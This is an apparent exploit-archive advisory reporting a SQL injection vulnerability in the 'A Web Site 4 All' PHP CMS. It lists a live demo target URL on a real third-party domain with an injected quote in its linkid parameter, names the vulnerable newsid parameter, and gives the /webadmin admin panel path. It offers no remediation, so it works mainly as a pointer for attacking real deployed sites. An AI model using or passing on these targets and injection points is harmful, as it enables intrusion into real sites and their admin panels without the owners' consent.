A Web Site 4 All suffers from a remote SQL injection vulnerability.
fa55b6a9b4f6d1ebcbc4fb1ee733544ec96efc4419db85e560e31df9421c4a4d
# Exploit Title: A Web Site 4 All Sql Injecti0n Vulnerability
# Date: 12/01/2012 - 00.36
# Author: 3spi0n
# Software Website: http://www.awebsite4all.com/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Demo Sites:
http://www.panchayats.in/php/showPanchNewsDetails.php?linkid=79%22&newsid=25[PhpSQLi]
[$] Vulnerable File:
News.php?newsid= And Like.
[$] Admin Panel:
/webadmin
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
Bug Researcher Group - TURKEY
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>